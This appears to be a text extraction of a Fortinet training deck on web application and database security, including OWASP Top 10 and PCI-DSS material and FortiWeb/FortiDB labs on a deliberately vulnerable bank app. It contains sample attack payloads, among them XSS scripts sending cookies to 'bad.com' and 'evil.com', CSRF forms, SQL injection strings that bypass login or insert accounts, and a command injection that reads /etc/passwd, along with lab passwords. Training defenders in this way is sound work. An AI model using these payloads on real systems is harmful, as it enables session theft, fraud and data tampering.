Академический Документы
Профессиональный Документы
Культура Документы
AGENDA
1 2
Introduction to Web Application Security Database Vulnerabilities & Miss Configurations Owasp Top 10 and PCI-DSS Lab Installation and Setup Introduction to FortiWeb How to PoC FortiWeb FortiWeb Basic & Advanced Troubleshooting Introduction to FortiDB How to PoC FortiDB FortiDB Basic & Advanced Troubleshooting
3
4 5 6
7
7 8 9
Internet
Web apps are written for efficient delivery of content In most cases web apps are not developed with security in mind
Leaves apps open to exploit Potential exposure of sensitive information Attacks can range from simple defacement to identity theft, credit card and other PII theft
Database Servers
POST Method: Submits data to be processed to the identified resource. Data is included in the message body
POST /login.php?username=User1&password=pass1 HTTP/1.1
Client-side
Action occurs on the client side (browser) The instructions are executed on users computer
Database/filesystem input
Configuration
SQL Injections
Injection attacks trick an application into including unintended commands in the data send to an interpreter. Interpreters
Interpret strings as commands. Ex: SQL, LDAP, XPath
Key Idea
Input data from the application is executed as code by the interpreter
SQL Injections
Attacker
User
1. 2. 3. 4. 5.
6.
App sends form to user Attacker submits form with SQL exploit data Application builds string with exploit data Application sends SQL query to DB DB executes query, including exploit, sends data back to application Application returns data to user.
Form
Pass
or 1=1--
Firewall
Web Server
DB Server
Exploits of a MOM
Steal cookies
Hijack of users session Unauthorized access
2
www.badguy.com Cookie collector
Malicious content dose not get stored in the server The server bounces the original input to the victim without modification
1
Attacker Upload malicious scripting commands to the public forum
Great message! <script> var img=new Image(); img.src= "http://www.bad.com/CookieStealer/ Form1.aspx?s= "+document.cookie; </script>
Browse
The server stores the malicious content The server serves the malicious content in its original form
Exponential growth
7 hours, ~200 infected 12 hours, ~10K infected
Some Reflections
DATA
Database Heist
RSA
Proprietary information about RSA's SecurID authentication tokens. (2011)
June 7, 2011 RSA Faces Angry Users After Breach The nations biggest banks and large technology companies like SAP rushed Tuesday to accept RSA Securitys offer to replace their ubiquitous SecurID tokens as many computer security experts voiced frustration with the company.
HBGary Federal
60,000 confidential emails, executive social media accounts, and customer information.(2011)
2011-03-01 The embattled CEO of HBGary Federal has resigned his post three weeks after Anonmyous hacked into the companys network and stole thousands of e-mail messages.
Epsilon
E-mail databases from 2 percent of the firm's 2,500 corporate clients. (2011)
April 02, 2011 Major Breach at Epsilon, the World's Largest Permission Based Email Marketing Services Company, Affects Wide Range of Major Brands - List Continues to Grow
Regulatory Environment
Cross industry Regulation/ PCI SOX High level requirements for databases PID data access monitoring in databases Auditing Financial database transactions to ensure integrity of financial statements
Vertical /Gov.
Regulation(s)
Finance
Healthcare Pharma. States Federal
GLBA, Basel II
HIPAA CFR part 11 CA law 1386 FISMA(NIST 80053A)
Change Control
Keep track of all changes related to database structures (DDL) and users (DCL)
Virtualization
Support both virtualized and non-virtualized environments
A1 - Injections
DB
Client
Appl
Shell
Pgm
CPU
A1 - Injections
String query = "SELECT * FROM accnts WHERE ID='" + request.getParameter("id") +"'"; id="foo" SELECT * FROM accnts WHERE ID='foo'; id="foo';DROP accnts;--" SELECT * FROM accnts WHERE ID='foo';DROP accnts;--';
Browser Appl DB
Browser
(String) page += "<input name='cc' type='TEXT' value='" + request.getParameter("CC") + "'>"; CC=123456789" <input name='cc' value='123456789'> CC=123456789"><script>window.location=http://evil.com? x=document.cookie</script> <input name='cc' value='123456789><script> window.location=http://evil.com?x=document.cookie </script>'>
A3 Broken Authentication
Unpredictable passwords, sessions-ID, securityquestions No sessions-id/credentials i URL Avoid session-fixation Time out of sessions & logout buttons Different sessions id outside/inside TLS No clear text passwords
period=2011q3
<img src="http://example.com/transferFunds?amount=1500 &destinationAccount=attackersAcct#width="0" height="0" /> <body onload="document.forms[0].submit()"> <form method="POST" action="https://bank.com/fn"> <input type="hidden" name="sp" value="8109"/> </form>
Patching
OS Application Frameworks / libraries
Keep track on sensitive data Password one-way-hashed & salted Password/Key management
TLS key pass phrase M2M lsenord (obfuscation)
/user/getAccounts /admin/getAccounts
http://www.vuln.com/redir.asp?=http://www.links.com http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D
Sub-requirement 6.3
Develop software applications based on industry best practices and incorporate information security throughout the software development life cycle. 6.3.1 Testing of all security patches 6.3.2 Separate development, test, and production environments 6.3.3 Separation of duties between development, test, and production 6.3.4 Live PANs are not used for testing or development 6.3.5 Removal of test data and accounts before production 6.3.6 Removal of custom application accounts, usernames, and passwords 6.3.7 Review of custom code prior to release to production or customers
Sub-requirement 6.3
Develop all web applications based on secure coding guidelines such as the Open Web Application Security Project (OWASP) guidelines. Review custom application code to identify coding vulnerabilities.
6.5.1 Unvalidated input 6.5.2 Broken access control (for example, malicious use of user IDs) 6.5.3 Broken authentication and session management (use of account credentials and session cookies) 6.5.4 Cross-site scripting (XSS) attacks 6.5.5 Buffer overflows 6.5.6 Injection flaws (for example, structured query language (SQL) injection) 6.5.7 Improper error handling 6.5.8 Insecure storage 6.5.9 Denial of service 6.5.10 Insecure configuration management
Sub-requirement 6.6
Ensure that all web-facing applications are protected against known attacks by applying either of the following methods:
Having all custom application code reviewed for common vulnerabilities by an organization that specializes in application security Installing an application layer firewall in front of web-facing applications.
Lab Topology
VM Database & FortiDB IP: 2.2.2.20/24 Windows XP Administrator/fortidb1!$ FortiDB admin/fortidb1!$
HTTP_Server
DB_Server
Hard Disk: 20 Gb
Hyper Threading enabled
Lab Flows
One-Arm HTTP Proxy Topology Give us enough flexibility for our Labs VM Database & FortiDB IP: 2.2.2.20/24 Windows XP Administrator/fortidb1!$ FortiDB 4.2.1 admin/fortidb1!$
Lab Flows
One-Arm HTTP Proxy Topology Give us enough flexibility for our Labs VM Database & FortiDB IP: 2.2.2.20/24 Windows XP Administrator/fortidb1!$ FortiDB 4.2.1 admin/fortidb1!$
This flat network deployment not recommended in a production environment since a client can easily bypass FortiWeb
index.html
Redirect to index.php?p=login.ht ml
show_profile.php
Show customer information
save_profile.php
Save changed customer information
topFrame.html
Top Frame
list_accounts.php
List customers associated accounts
list_activity.php
List account activity
index.php
Frameset
login.html
Login Page
verify_admin.php
Authenticate customer
list_cards.php
List customers associated cards
bottomFrame.html
Bottom Frame
show_transaction. php
Show transfer information
save_transa ction.php
Make transfer
2. Unique Object Name 3. Virtual IP address 4. Listening Interface 1. Create a new Virtual Server Object
2. Unique Object Name 3. Default Action = Deny 4.Click OK to save 5. After saving click Create New
1. Hostname used by client 2. Accept HTTP Traffic with hostname 3. Click OK to save
Final Results
2. Note the MAC addresses for the IP address of your FortiWeb and your Virtual IP. Are the same?, why?
2. Ping www.xbank.com. Does it work? 3. Access www.xbank.com using your browser. Does it work?. Why? 4. Add a new entry in your protected server to accept requests to www.xbank.com
Final Results
Final Results
PWD: fortidb1!$
Monitoring xbankapp_db
1. Navigate to Targets
4. Test Connection
3. Save
5. Save
3. Save
2. Select Start monitoring when FortiDB starts & Click the Start Monitoring Button
3. Save
Monitoring check
Introduction to FortiWeb
Network Firewall
FortiWeb
Web Application Firewall
Only Web Application Firewalls can detect and block application attacks!
Application Delivery
Assures availability and accelerates performance of critical web applications
FortiWeb Antivirus Service subscription automated content updates for file upload scanning
FortiWeb
Web Application Servers
Reverse Proxy
FortiWeb
High Availability
Active / Passive failover
Full configuration synchronization Seamless fail-over No down time
Configuration Sync
Sync FortiWeb devices across networks Allows managing policies across multiple devices from a central location Seamless integration into already existing HA/LB environments
FortiWeb
Server Farm
Disaster Recovery
FortiWeb-400C
FortiWeb-1000C
FortiWeb-3000C/3000CFsx
FortiWeb-4000C
FortiWeb-VM
Deploy FortiWeb in a virtualized environment
Mitigates blind spots Protects web applications regardless of connection origin Provides visibility to internal connections as well Same functionality as appliance
DMZ
Public Zone
Requirement
Licenses Hypervisor Memory CPU 10/100/1000 Interfaces Storage Capacity
Servers / DMZ
FortiAnalyzer Integration
Acceleration
Integrated ASIC based hardware SSL offloading offload CPU intensive SSL computing from server to FortiWeb
Hardware-based key exchange and bulk encryption Purpose built SSL processing Full certificate management Advanced certification verification and revocation capabilities
FortiWeb
Data Compression
Compress poorly optimised content to minimise impact on network resources and reduce application delivery latency Allows efficient bandwidth utilization and response time to users by compressing data retrieved from servers Compresses files using gzip Compression rate depends on data type and character redundancy
FortiWeb
Load Balancing
Intelligent, application aware layer 7 load balancing Support for HTTP/HTTPS only Variety of Load Balancing algorithms
Round Robin Weighted Round Robin Least Connection HTTP Session Based Round Robin
Connection persistence
Persistence timeout value
Absolute links
Any required content Multiple content types supported
Enhanced/Basic Mode Authentication options Granular crawling capabilities Schedule and on demand scanning
FortiWeb
Scan summary Vulnerability by severity Vulnerability by categories Application Vulnerabilities Common Vulnerabilities
Crawling information URLs accepting input External Links
Server Information
Email reports automatically Updates via FortiGuard Complements WAF for PCI DSS 6.6
Slow based and legitimate request attacks Using tools that can be easily downloaded from the internet such as HOIC and LOIC Using botnets and automatic tools to reach mass Sometimes camouflaging real data breach attempts
SQL Injection primarily
Zombie Botnet Many become one
Malicious IPs - Limits the number of TCP connections with the same session HTTP Flood Prevention - Limits the number of HTTP requests per second with
the same session cookie
TCP connection, per second, to a specific URL before FortiWeb issues a script to the client to validate whether this is a real browser or an automated tool
WAF
Monitors application files at specified time intervals Upon file change detection FortiWeb
Alert Automatically restore
Protocol Validation
Validates HTTP RFC compliance
Event/Attack/Traffic Alerts
Attack Alerts
Full HTTP request Any access to web applications Any action on FortiWeb device
Reports - Attacks
Out of the box rich and graphical reports Custom reports Scheduled daily, weekly, Monthly or on demand PDF, HTML, Word, TXT, MHT formats
Application Security
HTTP Compliance Application Signatures Auto Learn
Accurate protection with multiple layers of defense Integrated Web Vulnerability Scanner Protects against the OWASP Top 10
Application Delivery
Authentication Load Balancing and Acceleration Compression
Automated management using Auto Learn Baselining Easily deploys in any environment
Multiple deployment options
FortiClient Desktop
Accelerates applications
Application aware Load Balancing Compression ASIC based SSL Acceleration
Vulnerability Assessment
URL Rewriting
Without URL rewriting when accessing the XBANK application the end user(s) are required to specify /xbank/ in the URL path, due to the existing directory structure. The URL Rewriting feature removes this requirement. Added Benefit: Transparently hides the internal directory structure from end user(s)
1. Unique Rule Name 2. What to rewrite 3. Where to rewrite 4. Click OK to save 5. Click Create New to define RegEx
A Note on Regular Expressions Matching URL Paths to a regex provides a concise and flexible means for matching strings of text.
Metacharacter Description
[] ^ $ * ? | ()
Specify the new URL path to be used to connect to the defined physical server NOTE: $0 = the first RegEx parameter matched (everything inside the first set of parenthesis)
3. Unique Policy Name 4. Click OK to Save 5. Click Create New to select and prioritize Rewrite Rule(s)
Final Results
Information Disclosure 1. Usually one of the first steps taken from malicious users that will attack a system is gathering information about it: Operating System, versions, application types, etc. 2. This gathering process is known as fingerprinting 3. The Server Protection rule Information Disclosure helps prevent the disclosure of this type of information.
Prevent Information Disclosure 1. Point your browser to http://www.xbank.com/xxx.html 2. What did you get as response?. Any problem with it? 3. Sometimes applications give to much information when showing an error.
1. 2. 3. 4.
Name the Server Protection Policy: Server_Protection-xbank Enable only the Information Disclosure rule Select the Action of Alert & Erase Click OK to save
Cross Site Scripting (XSS) This is a type of attack on which malicious scripts are injected into trusted sites. Most of the time the reason a site is vulnerable to this type of attack is because they dont do appropriate parameter validation Can be used to steal credentials, user and cookies information It exploits the fact that the user trusts the site
Cross Site Scripting (XSS) An example (index.php) Determining what parameter p is used for?
This is just a simple example of XSS! You dont need to guess what happens when a malicious site is used instead of www.google.com?
1. Parameter Name: p 2. Max Length set to default value of 0 3. Select Required 4. Select Use Type Check 5. Select Argument Type = Regular Expression 6. Regular Expression = ^login.html$ 7. Click OK to save
6. Final Result
1. Apply the Parameter Validation Policy Parameter_Validation_Policy1 to the Inline Protection Profile xbank_web_protection 2. Click OK to save
SQL Injection attack is about modifying SQL sentences by inserting special strings in application fields, URLs, hidden fields, etc.
INSERT INTO xbank_customer ( customer_login, customer_password, customer_fname, customer_lname) VALUES ( mylogin, abc1234, John, Anderson)
SQL Injection A look into verify_admin.php (2) 1. mssql_pconnect( ): Connect to the DB Server
SQL Injection - CHALLENGE: Login to the application Try to login to the application without using any valid user or password. TIP: Youll have to inject some SQL
from
xbank_customer where customer_login = whatever you want and customer_password = mypassword or a=a ;
1. Edit Known Attacks Sever_Protectionxbank 2. Enable ALL SQL Injection signatures 3. Select Alert & Deny as the action 4. Click OK to Save 5. Attempt a new SQL Injection
4. Assign the new Input Rule to the already applied Parameter Validation Rule
Command Injection
Command Injection Review Command Injection is a type of attack that benefits from vulnerable applications to execute commands in underlying operating system Its a type of a more general category called Code Injection.
exec( ) function executes an operating system command. In this case exec( ) is generating a log entries for successful and failed logins and is using the variable $log
4. You just copied the content of /etc/passwd to a file in sites root directory, salida.txt
Command Injection Executing commands (2) 5. Go to the HTTP Server (Linux) an see if the file /var/www/xbank/salida.txt
Command Injection Executing commands (3) 6. Since we disabled Parameter Validation rules we can user the browser to inspect the file
http://www.xbank.com/index.php?p=salida.txt
CSRF Attacking www.xbank.com > Check balance Open your browser and go to www.xbank.com
CSRF Attacking www.xbank.com > run attack Search for the file csrf_page.html in the resource provided and double-click it
CSRF Attacking www.xbank.com > See balance delta Check your balance again
Any change?
Prevent CSRF Applying business logic On way of preventing CSRF is enforcing the session to follow the application logic. For instance; to perform a withdrawal in www.xbank.com you should first go through
1. verify_admin.php
2. do_transaction.php 3. save_transaction.php
Page Access Rule functionality enforces business logic by means of a cookie, FORTIWAFSID
2. Create New
Prevent CSRF Testing Configuration > Check Balance 1. Log back into www.xbank.com 2. Stay at the account listing page and review balance
Prevent CSRF Testing Configuration > Rerun attack Log back into www.xbank.com Stay at the account listing page and review balance Open your browser cookie viewer and search for the cookie FORTIWAFSID Double click csrf_page.html
Prevent CSRF Testing Configuration > Verify No change Review your balance Any change?
Brute Force Attacks Login names and passwords always presents a challenge in application security Weak passwords is one of the most common attack vectors used to gain access to an application Dictionary attack or brute force login attacks consists of trying to guess a valid username and password combination FortiWeb offers the possibility of preventing these attacks using statistical thresholds (similar to DoS Sensors in FortiGate)
2. Create New
How does FWB determine that a multiple connections originate from more than 1 computer?
Instead of only counting hits by source IP,
1. Name
Note the page that should be monitored is verify_admin.php, but we are using login.html because it is easier to test with.
Configuring Brute Force Login Rule (3) Apply the Brute Force Login rule to xbank_web_protection Access http://www.xbank.com/login.html Refresh your browser as fast as you can until you get banned for 10 seconds (F5, Command + R, etc.)
Auto-Learning
FortiWeb Deployment Auto-Learning Any WAF deployment requires some knowledge of the application This adds complexity to the deployment Auto-Learning is a mode that can help during the deployment phase to create a baseline based on the behavior
Configuring Auto-Learning 1. Go to Auto Learn Auto Learn Profile Default Auto Learn Profile and create a new Inline Profile named xbank-auto
1. Go to Auto Learn -> Auto Learn Profile -> Auto Learn Profile
1. Name Profile
3. Click OK to save
2. Edit Xbank_web_policy
1. Go to Server Policy
Configuring Auto-Learning > Test WAF Auto Learn Profile 1. Access the XBANK site and navigate on it. Try to access every page, make transfers, update profile, etc. 2. Go to Auto Learn Auto Learn Report in the FortiWeb 3. Review the report automatically generated by auto-learn feature 4. Download the Report as PDF and review it 5. Note that is possible to edit and adjust some of the results 6. Generate Configuration based in the Auto-Learn report
1. Generate Config
2. Name Profile
2. Click OK to save
Configuring Auto-Learning > Review generated configuration Pay special attention to the Parameters Validation rules
Web Defacement
Anti-Defacement Tool
Web Defacement A website defacement is an attack on a website that changes the visual appearance of the site or a webpage
FortiWeb Anti-Defacement Tool FortiWeb has a Anti-Defacement tool that recognizes when a web site file has been changed and reacts accordingly 1. Backup and creates a hash for each sites objects 2. Monitor each object comparing their hash with the ones registered 3. If any change:
Alert and manually recover changed file Automatically recover changed file
2. Create New
1. Go to Web Anti-Defacement
Name Policy
for monitoring Go to Web Site with Anti-Defacement & Create New Policy
Configure Anti-Defacement Tool > Review After a while, you should see a connected status and the number of files that were backed-up
Configure Anti-Defacement Tool > Review (2) Inspect the policy details and statistics
Configure Anti-Defacement Tool > Review (3) Inspect the list protect files and attributes
3. Inspect changes by clicking on the Total Changed files number 4. Access the XBANK site and you will see the defaced site
Configure Anti-Defacement Tool (8) Review log file and verify the defacement event
System Top
# diag system top Proceso, id del Proceso, estado, Consumo de cpu Consumo de memoria Si presionas q te ordena Consumo de procesador o memoria
Execute Options
# execute ?
El traceroute al modificar el ping-options tambien se hace respecto al source del ping. Cuando se da de alta un fortigate o fortiweb: para evitar el tiempo de espera de registro en fortiguard utilizar: Exec-update-av exec update-ips Exec update-now El reseteo del disco de logs pide reinicio.
Execute Ping
# execute ping
Execute Traceroute
# execute traceroute
Diagnose Commands
Crash Log
# diagnose debug crashlog read
Use this command to show crash logs from application proxies that have call back traces, segmentation faults, or memory register dumps, or to delete the crash log.
Use this command to set the verbosity level of debug logs for autolearning.
Use this command to set the verbosity level of debug logs for SSL inspection (temporary decryption in order to enforce policies). SSL inspection is used only when FortiWeb is operating in a mode that supports it, such as true transparent mode, transparent inspection mode, or offline protection mode.
Use this command to set the verbosity level of debug logging for SSL/TLS offloading. SSL offloading is supported only when the FortiWeb appliance is operating in reverse proxy mode or true transparent proxy mode.
Use this command to set the verbosity level of debug logs for the HTTP protocol parser. This parser module dissects the HTTP headers and content body for analysis by other modules such as rewriting, HTTP protocol constraints, server information disclosure, and attack signature matching.
Diagnose Network
# diagnose network tcp list
Diagnose Network
# diagnose network arp add <interface_name> <interface_ipv4> <mac-address_hex> # diagnose network arp delete <interface_name> <interface_ipv4> <mac-address_hex> # diagnose network arp list
Use this command to add or delete an address resolution protocol (ARP) in the internal ARP table, or to display the ARP table.
Diagnose Policy
# diagnose policy dashboard {all | list <policy_name>} # diagnose policy memory show <policy_name> # diagnose policy pserver list <policy_name> # diagnose policy session {count <policy_name> | list <policy_name>} # diagnose policy traffic show <policy_name>
Use this command to view the process ID, memory usage, live sessions, and traffic statistics associated with a server policy.
Introduction to FortiDB
Introducing FortiDB
Native Audit
Selective Audit, only 3-4% performance impact Does not require agents Captures 100% of events
Network Agents
2-3 % performance impact on the server (not the DB) Agents send information back to FortiDB appliances
FortiDB Family
FortiDB-400C
Targets SMB market with up to 10 Database servers
FortiDB-1000C
Scalable solution for up to 60 database servers
FortiDB-2000B
Enterprise deployment with redundant AC-power and support for up to 60 database servers
FortiDB Software
Database Servers
Support for both agent based, and agent less deployment with an additional sniffer-mode option
Providing a solution for every architecture
Out of the box VA Policies Policy updates through FortiGuard Services Mapping to CIS, PCI benchmarks Risk levels Remediation advice Pentest module
FortiDB
Critical in establishing
Minimal privilege setting scheme Can be exported into reports
FortiDB
Admins usually do not understand how all these elements work together
Which user accesses which database What tables users access regularly Where do users come from and what tools do they use (IP, source application, etc) What is normal behavior and what is suspicious
X X
A profile/baseline must be created automatically, with constant updates in order to understand the environment Once the baseline is established it will be easy to detect Suspicious behavior
FortiDB
Alerts Summary/Analysis
Alerts Summary Displays alerts trends Timeframes are 7, 30, 90 days and 12 months Important for understanding trends Alerts Analysis Primary focus is more detailed Analysis Grouped by :Severity, Policy, database Action, and different client information More granular view of trends
Reporting/ Compliance
Automated Compliance reports Reports with detailed drilldowns Integration with ArcSight Archive
FortiDB Summary
Multiple Data Collection methods
Sniffer Native Audit Agents Out of the box policies for privilege users and object/schema design changes User, session and data policies allowing audit of every request Real time alerts Pre-defined audit policies Pre defined Compliance Reports Roles and Privileges reports Identifies vulnerabilities and provides remediation advice Verifies configuration Built in best practices User Activity Profiling
Vulnerability Assessment
Database Compliance
Compliance policies Compliance reports
Sensitive data discovery in databases Database Activity Monitoring with realtime alerts Vulnerability scanning with remediation advice User Activity Profiling for Baselining
1. Go to Assessments 2. Add
Database Vulnerability Assessment > Select Tests Select Assessment Tests (Policies)
Save
Database Vulnerability Assessment > Run Assessment Select (Check Box) & Run Assessment
Database Vulnerability Assessment > Review Results Select the Results tab and click on the Assessment Start Time to view the summary Results for each target
Database Vulnerability Assessment > View Detailed Report Select Target name to view Vulnerability Assessment Detailed Report
Configuring Sensitive Data Discovery > Create New Policy Navigate to Policy > Data Discovery Policies Click Add to create a new Data Discovery Policy
Configuring Sensitive Data Discovery > Select Target Navigate to Vulnerability Assessment > Sensitive Data Discovery Select Target Name = xbankapp_db to select details and apply Policy Group
Configuring Sensitive Data Discovery > Select DB Meta Select Target Details (Databases, Tables, Columns)
Configuring Sensitive Data Discovery > Run Discovery Run Data Discovery Select Target xbankapp_db and Start Scan Observe progress under Last Discovery column
Configuring Sensitive Data Discovery > Discovery Results After starting the Data Discovery Observe the results under the Last Discovery column Click the results link to view the Detailed Report
Configuring Sensitive Data Discovery > Preview Report Preview Report Details
2. Add
2. Add
1. Highlight database
2. Highlight tables to scan and use the arrow to mark them as selected
Configuring Sensitive Data Discovery (8) 1. Once the Sensitive Data Discovery is configured you can run it and wait until the scan finishes 2. After that, review results and see if it found something
DAM Policies
2. Add a new Table Policy that generate an event when someone different from dbo reads or writes into dbo.spt_values table
3. Create a custom DAM Policy Group and add created policy as member 4. Assign the new Policy Group to the MSSQL monitor 5. Configure and Start monitor 6. Generate events 7. See results
2. Go to the Alerts Pane 3. Select recently created group. You shouldnt see any alert
SQL Injection
INSERT INTO xbank_customer ( customer_login, customer_password, customer_fname, customer_lname) VALUES ( mylogin, abc1234, John, Anderson)
SQL Injection - CHALLENGE: Login to the application Try to login to the application without using any valid user or password. TIP: Youll have to inject some SQL
from
xbank_customer where customer_login = whatever you want and customer_password = mypassword or a=a ;
SQL Injection Creating a new user Besides modifying the condition, we can benefit from the ; to actually create a new user in the database Before showing how to create a new user by injecting code, let's configure the FortiDB to alert when the application launch an INSERT. The XBANK application should NEVER execute an INSERT or DELETE in xbank_customer table.
2. Policies
1. Name
3. Save
customer_password = a' ; insert into xbank_customer (customer_login, customer_password) values ('imbad,'1234') ; select * from xbank_customer where customer_login = a ;
Login to the application using imbad as login name and 1234 as password. Voil!
If something goes wrong, you will see details of the connection problem
Monitoring Check
System Resources
FortiDB Appliances have a System Resources option at the GUI
The System Resources section displays usage of the FortiDB unit's resources, including CPU, memory (RAM) and hard disk.
CPU Usage: The current status of CPU usage. This field displays CPU usage for core processes only. CPU usage for management processes (for example, for HTTPS connections to the web-based manager) is excluded. Memory Usage: The current status of memory usage. This field displays memory usage for core processes only. Memory usage for management processes (for example, for HTTPS connections to the web-based manager) is excluded. Hard Disk Usage: The current status of hard disk usage. This field displays the amount of hard disk space used.
Execute Ping
The execute ping command allows you to send an ICMP echo request (ping) to test the network connection between the FortiDB system and another network device.
Syntax:execute ping {<ip> | <hostname>}
Execute Traceroute
The execute traceroute command allows you to test the connection between the FortiDB system and another network device, and display information about the network hops between the device and the FortiDB system.
Syntax:execute traceroute {<address_ipv4> | <host-name>}
Enter the following command to copy the backup configuration settings to restore the file on the FortiDB unit:
execute restore all-settings <ftp server> <filepath> <username> <password> [crptpasswd]
Note: This operation will replace your current settings and necessitate a reboot.
where: <before-date> Date of the last archive you want included in your backup. The format is YYYY-MM-DD (MM(1-12), DD(1-31)).YYYY is a 4-digit number representing the year.
<ftp server> IP address or hostname of FTP server. <username>User name of account that logs on to the FTP server. <password>Password of account that logs on to the FTP server. [directory]Location on FTP server where you want the tar file to be placed. [filename]Name for the tar file on the FTP server where you want the archives to be placed. The default file name is FD-ARCHIVE-<before-date>.tar. Sample command: execute backup-remove fd-archive 2008-07-30 <your_ftp_server> <your_ftp_username> <your_ftp_password> . myArchives.tar
where: <before-date> Date of the reports you want included in your backup. The format is YYYY-MM-DD (MM(1-12), DD(1-31)).YYYY is a 4-digit number representing the year.
<ftp server> IP address or hostname of FTP server. <username>User name of account that logs on to the FTP server. <password>Password of account that logs on to the FTP server. [directory]Location on FTP server where you want the tar file to be placed. [filename]Name for the tar file on the FTP server where you want the archives to be placed. The default file name is The default file name is FD-REPORT-<before-date>.tar. Sample command: execute backup-remove fd-report 2008-07-30 <your_ftp_server> <your_ftp_username> <your_ftp_password> . myReports.tar
Diagnose Command
Diagnose command display diagnostic information that helps you to troubleshoot problems. diagnose system export This FortiDB CLI allows you to export diagnostic information to an FTP server. Syntax: diagnose system export fd_log <ftp server> <user> <password> [directory] [filename] where: <ftp server> IP address or hostname of FTP server <username> User name of account that logs on to the FTP server <password> Password of account that logs on to the FTP server [directory] Location on FTP server where you want the diagnostic file to be placed [filename] Name of the zip file that contains several log files that will be put on the FTP server. If you don't specify a filename, you will get a default file called fortidb.zip. Sample command: diagnose system export fd_log <your_ftp_server> <your_ftp_username> <your_ftp_password> . myDiagnose.zip
Execute Top
The execute top command allows you to view the processes running on the FortiDB system. Syntax:execute top
To exit the display, type q. Other interactive commands are available while running top. For help on them, type h.
Execute Restart
This FortiDB CLI allows you to shutdown and restart the application server under which FortiDB is running Syntax:execute restart appserver
Execute Reboot
The execute reboot command allows you to restart the FortiDB system. This command will disconnect all sessions on the FortiDB system. Syntax:execute reboot
Execute Reset
The execute reset command allows you to reset the FortiDB system to factory defaults. This command will disconnect all sessions and restart the FortiDB system. Syntax:execute reset {admin-password | all-settings | data} where:
admin-password: Reset admin's password to default password. all-settings: Reset the all settings Data: Reset the database
Questions
Thank you